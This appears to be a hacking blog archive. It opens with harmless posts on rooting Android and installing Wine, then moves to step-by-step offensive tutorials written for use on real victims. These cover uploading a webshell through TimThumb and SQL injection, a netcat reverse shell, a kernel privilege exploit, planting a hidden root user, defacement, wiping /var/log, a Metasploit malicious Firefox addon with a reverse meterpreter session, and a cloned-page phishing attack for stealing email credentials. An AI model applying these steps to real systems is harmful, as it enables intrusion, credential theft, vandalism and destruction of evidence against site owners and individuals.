Friday 10 June 2016

How to Root Android without Computer (APK ROOT without PC)

Kingo Android Root has launched its KingoRoot apk for Android, which provides a universal one-click Android root solution for Android users. It is easy to use and saves the trouble to connect to PC via USB cable.
Before jumping into the rooting process, please make sure you get everything right beforehand.
  • Device powered on.
  • At least 50% battery level.
  • Internet connection necessary (Wi-Fi network suggested).
  • Allow installation of apps from unknown sources. Settings > Security > Unknown Sources

Root Android via KingoRoot APK Without PC Step by Step


Step 1: Free download KingoRoot.apk.

Root Android with KingoRoot apk, without connecting to PC
The download will be automatically started. If Chrome has warned you about KingoRoot.apk, click "OK" to proceed.
KingoRoot Apk Download, the best one-click root apk for free
If you are using PC to view this tutorial, you have three choices.

Step 2: Install KingoRoot.apk on your device.

If you didn't check "Unknown Sources" in Settings > Security, then during installation, you will get a prompt "Install blocked", stating that "For security, your phone is set to block installation of apps obtained from unknown sources".
Root any Android device with KingoRoot, the best one-click Android apk root tool.
Just follow phone instructions and install Kingo Root on your device and allow installs from "Unknown Sources".
Root any Android device with KingoRoot, the best one-click Android apk root tool.

Step 3: Launch "Kingo ROOT" app and start rooting.

Kingo Root is very user-friendly and easy to use. Click "One Click Root" to start the rooting process.
Kingo Root Apk Main Interface

Step 4: Waiting for a few seconds till the result screen appear.

Kingo Root Apk Rooting

Step 5: Succeeded or Failed.

It is highly recommended that you try several times when rooting with KingoRoot apk version. We have several rooting methods integrated in apk root, however, it will only run one at a time.

Tuesday 31 May 2016

How to install Wine on Kali Linux and Debian 64 bit

To install wine. We'll first enable maltiarch, then update the system and finally install wine. The commands to accomplish that are as shown below.

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine:i386
sudo apt-get install wine-bin:i386
It will download the packages and install them. After finishing the installation, check again to confirm that the wine have been installed successfully.Type
wine --version 
If you want an all in one command, here it is.
 sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine-bin:i386

Wednesday 13 April 2016

How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

– Backtrack (Backtrack Website)
– Firefox (get it from here….) – Included in Backtrack and Ubuntu
– Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
– iCon2PHP (Get it from here….)
– A good shell (iCon2PHP Archive includes three great shells)
– A good VPN or Tor (More explanation below…..)
– Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack
— Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
— Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
— Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
— iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
— While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
— Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png(instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[…]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com(or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
— The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
— Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log

Hacking Remote Machines With Firefox Bootstrapped Addon

Metasploit has basically two type of exploits included in its database which are remote exploits and client side attacks.
Well in this tutorial, i will show you how to use metasploit's bootstrapped firefox addon over WAN (wide area network) or Internet.

Requirements:

  • Router (With Port Forwarding Support)
  • Metasploit Framework
Exploit Title: Firefox Bootstrapped Addon

I will use teamviewer to show you remote machine's ip and activities status.

Attacker's Public IP: 182.186.248.2

Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X

Step1: 
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
  1. webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
  2. payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Step2: 
Now start msfconsole and use following exploit:

use exploit/multi/browser/firefox_xpi_bootstrapped_addon


use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:


set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2 set lport 7777

Step3:
Now send this server's address to victim: 
http://182.186.248.2:8080/

When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)




If you feel some trouble while following tutorial you may ask me in comments.

Pyloris Application Layer DOS ATTACK Tool


Pyloris is an inspired python implitmentation of slowloris tool which was written in Perl.
PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Download Pyloris

Shell Uploading With SQL Injection

direct shell uploading with SQL injection queries

First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.
You need 2 main things:

Root Path of the website
A Writable Directory

Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327

Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.

www.site.com/index.php?id=10'

I am not starting with abc of SQLI I hope u know the basics.
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user Ch3rn0by1
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.
Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

now we have our webserver etc (/home/Ch3rn0by1)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--

Where Ch3rn0by1 is your webserver software name like server name.conf .

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D

site www.site.com/dir/*/*/*/*/

so its site.com/ch3rn0by1/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+

ok now we have to execute our commands

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use wget command to upload our evil script

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

Hacking Facebook with Kali

Steps for setting up your system.

  1. Download Kali Linux from here.
  2. Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it.
  3. After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd.
  4. After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement.
  5. NOTE:During installation,in mount point of selected installation drive,set mount point to "/".
  6. Remember the username and password while installation as this will be necessity for this hacking method.
  7. Once,installation is completed,system will reboot,login your account.
  8. Your system is ready for use.
Method which we are using to hack the username and password or any user details isSocial Engineering Toolkit method.


Now lets set it up.

  • Open terminal using ctrl+alt+t or click on the small black window image on the top left of your screen.
  • Once terminal is open,type the code carefully.
sudo root
 Then enter your root username and password.Don't close the terminal.

  • Next step is to open social engineering toolkit.For this type the below command in terminal.
se-toolkit

 You will see something in terminal of your system as shown below in the image.
  
ymail hack by nerd programmer
  • As shown above in image,you too will see the menu in your terminal.Press "1" and hit enter as we are going to do Social-Engineering Attacks.You will see something in terminal as shown below in the image.
facebook hack by nerd programmer
gmail hack by nerd programmer
  • Once again,you will get a menu as shown above in the image.We are going to select Website Attack Vectors,so press "2" and hit enter.You will see something as shown in the image below.
nerd programmer
  • In this method,we are going to get the credential of the victim,so press "3" and hit enter as it will select credential harvester attack method.This will open  new menu as shown below in the image.

facebook hack by nerd programmer
  • Since,we want the username and password which is credential of victim,so we need to trap the victim in a look a like page to original website page(like phishing page) and for that we need to clone a website.To do this,press "2" and hit enter which will open something like shown below.
    ymail
In above image,you might have noticed a red colour rectangle box made by me,in that box,you will find "tabnabbing:XXX.XX.XXX.X" where this "XXX.XX.XXX.X" is you computer IP address.To find IP address of your computer,open a new terminal and type the command given below.
su root
enter_your_root_password
 ifconfig
In above command,we first gain the root access,and then afterwards type "ifconfig"  and hit enter to get the IP address.
Copy paste this IP address at the end of "Tabnabbing:".I have used my IP address but for security reasons i can't reveal it,so i have posted here "XXX.XX.XXX.X".Please note that,if you don't put your computer IP address,they this method won't.After entering your IP address,hit enter.It will ask your to enter the url of website you want to clone as shown below.Here,i had entered "www.ymail.com" as i want to hack someone ymail account.The below image represents all the steps.
It will give a message that its working on cloning the site and will take a little bit time.
Once the process is completed,you will see something as shown in the image below.
  • The next step is the most important step,till now we have make your IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone.In this step,you need to shortened your IP address by using services like ADF.LY, Binbox, Goo.gl,etc.Once you enter your ip address on these sites to shorten,they will provide you a link,all you need to do is just send this shortened link to your victim.
  • When the victim visit the url which you have sent them,the will see a same page of which                   url you had entered to clone the website.The victim will think that it is a original page and when the victim enters any of their information,you will see that information in the terminal.
  • In this example,i have used ymail.com.Therefore,the victim will see homepage of yahoo mail.This is only the login form,i have entered the login username as:"Kali used to hack email-id and password" and password as: "Hacking successfull".

NOTE:Victim can identify that the page is a trap as the address bar of browser will be having your IP address.For best results,send the shortened url to victim mobile and ask them to visit urgently,or you can say visit this link and login to get latest updates of their favourite contents,etc.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.